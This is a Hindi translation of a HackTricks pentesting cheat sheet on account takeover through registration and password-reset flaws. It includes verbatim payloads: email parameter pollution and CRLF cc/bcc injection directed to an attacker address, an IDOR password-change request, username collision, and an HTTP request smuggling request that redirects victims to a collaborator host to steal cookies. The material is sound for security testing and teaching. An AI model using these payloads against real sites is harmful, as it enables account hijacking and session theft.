hacktricks/pentesting-web/registration-vulnerabilities.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

177 lines
15 KiB
Markdown

# पंजीकरण और Takeover संबंधी सुरक्षा दुरुपयोग
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें।**
</details>
## पंजीकरण Takeover
### डुप्लिकेट पंजीकरण
* मौजूदा उपयोगकर्ता नाम का उपयोग करके उत्पन्न करने का प्रयास करें
* ईमेल को बदलने की जांच करें:
* अपरकेस
* \+1@
* ईमेल में कुछ कुछ जोड़ें
* ईमेल नाम में विशेष वर्ण (%00, %09, %20)
* ईमेल के बाद काले वर्ण डालें: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
### उपयोगकर्ता नाम जांच
जांचें कि क्या आप आवेदन के भीतर पहले से ही पंजीकृत उपयोगकर्ता नाम का पता लगा सकते हैं।
### पासवर्ड नीति
उपयोगकर्ता बनाते समय पासवर्ड नीति की जांच करें (क्या आप कमजोर पासवर्ड का उपयोग कर सकते हैं)।\
उस मामले में आप प्रमाणीकरण के लिए ब्रूटफोर्स कोशिश कर सकते हैं।
### SQL Injection
[**इस पेज की जांच करें**](sql-injection/#insert-statement) और पंजीकरण फॉर्म में **SQL Injections** के माध्यम से खाता ले जाने या जानकारी निकालने का प्रयास करने के लिए।
### Oauth Takeovers
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}
### SAML संकट
{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}
### ईमेल बदलें
पंजीकृत होने पर ईमेल बदलने का प्रयास करें और जांचें कि क्या यह परिवर्तन सही ढंग से सत्यापित हो रहा है या क्या इसे विचारहीन ईमेल पर बदल सकते हैं।
### अधिक जांचें
* **डिस्पोजेबल ईमेल** का उपयोग कर सकते हैं या नहीं जांचें
* **लंबा** **पासवर्ड** (>200) द्वारा **DoS** हो सकता है
* **खाता निर्माण पर रेट सीमाएं** जांचें
* उपयोगकर्ता नाम@**burp\_collab**.net का उपयोग करें और **कॉलबैक** का विश्लेषण करें
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### API पैरामीटर पर IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. हमलावर को अपने खाते से लॉगिन करना होगा और **पासवर्ड बदलें** फ़ीचर पर जाना होगा।
2. Burp Suite शुरू करें और अनुरोध को रोकें
3. इसे repeater टैब में भेजें और पैरामीटर संपादित करें: उपयोगकर्ता आईडी/ईमेल\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### कमजोर पासवर्ड रीसेट टोकन <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
पासवर्ड रीसेट टोकन को हर बार यादृच्छिक रूप से उत्पन्न और अद्वितीय होना चाहिए।\
यह निर्धारित करने की कोशिश करें कि क्या टोकन समाप्त होता है या क्या यह हमेशा समान होता है, कुछ मामलों में उत्पन्नन एल्गोरिदम कमजोर होता है और इसे अनुमान लगाया जा सकता है। निम्नलिखित चर प्रायोगिक हो सकते हैं।
* टाइमस्टैम्प
* उपयोगकर्ता की आईडी
* उपयोगकर्ता का ईमेल
* पहला नाम और अंतिम नाम
* जन्मतिथि
* गणितीय
* केवल संख्या
* छोटा टोकन अनुक्रम (अक्षरों के बीच वाले वर्ण \[A-Z, a-z, 0-9])
* टोकन पुन: प्रयोग
* टोकन समाप्ति तिथि
### पासवर्ड रीसेट टोकन लीक <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. विशेष ईमेल के लिए API/UI का उपयोग करके पासवर्ड रीसेट अनुरोध को ट्रिगर करें, उदा।: test@mail.com
2. सर्वर के प्रतिक्रिया की जांच करें और `resetToken` के लिए जांचें
3. फिर उपयोग करें टोकन को एक URL में जैसे `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### उपयोगकर्ता नाम संघर्ष के माध्यम से पासवर्ड रीसेट <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. विक्टिम के उपयोगकर्ता नाम के साथ एक उपयोगकर्ता नाम पर सिस्टम में पंजीकरण करें, लेकिन उपयोगकर्ता नाम के पहले और/या बाद में सफेद जगह डालें। उदा।: `"admin "`
2. अपने धोखाधड़ीपूर्ण उपयोगकर्ता नाम के साथ पासवर्ड रीसेट का अनुरोध करें।
3. अपने ईमेल पर भेजे गए टोकन का उपयोग करें और विक्टिम पासवर्ड रीसेट करें।
4. नए पासवर्ड के साथ विक्टिम खाते में कनेक्ट करें।
CTFd प्लेटफ़ॉर्म इस हमले के प्रति संक्रमित थी।\
देखें: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### क्रॉस साइट स्क्रिप्टिंग के माध्यम से खाता हथियाना <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. अनुप्रयोग या उपयोगकर्ता के कुकीज़ को प्रभावित करने वाले एक सबडोमेन में एक XSS ढूंढें, यदि कुकीज़ माता डोमेन के लिए स्कोप किए गए हैं: `*.domain.com`
2. मौजूदा **सत्र कुकी** को लीक करें
3. कुकी का उपयोग करके उपयोगकर्ता के रूप में प्रमाणित करें
### HTTP अनुरोध स्मगलिंग के माध्यम से खाता हथियाना <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1\. टाइप को खोजने के लिए **smuggler** का उपयोग करें HTTP अनुरोध स्मगलिंग का (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. एक अनुरोध तैयार करें जिसमें निम्नलिखित डेटा के साथ `POST / HTTP/1.1` को अधिलेखित किया जाएगा:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` लक्ष्य यह है कि पीड़ितों को burpcollab पर ओपन रीडायरेक्ट किया जाए और उनकी कुकीज़ चुराई जाएं\
3\. अंतिम अनुरोध निम्नलिखित की तरह दिख सकता है
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone रिपोर्ट इस बग का उपयोग करके हैक करने की बात कर रही है\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### CSRF के माध्यम से खाता हासिल करना <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. CSRF के लिए पेलोड बनाएं, उदा। "पासवर्ड बदलने के लिए ऑटो सबमिट के साथ HTML फॉर्म"
2. पेलोड भेजें
### JWT के माध्यम से खाता हासिल करना <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
JSON Web Token का उपयोग उपयोगकर्ता को प्रमाणित करने के लिए किया जा सकता है।
* दूसरे उपयोगकर्ता आईडी / ईमेल के साथ JWT संपादित करें
* कमजोर JWT हस्ताक्षर की जांच करें
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}
## संदर्भ
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks** में विज्ञापित करना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
</details>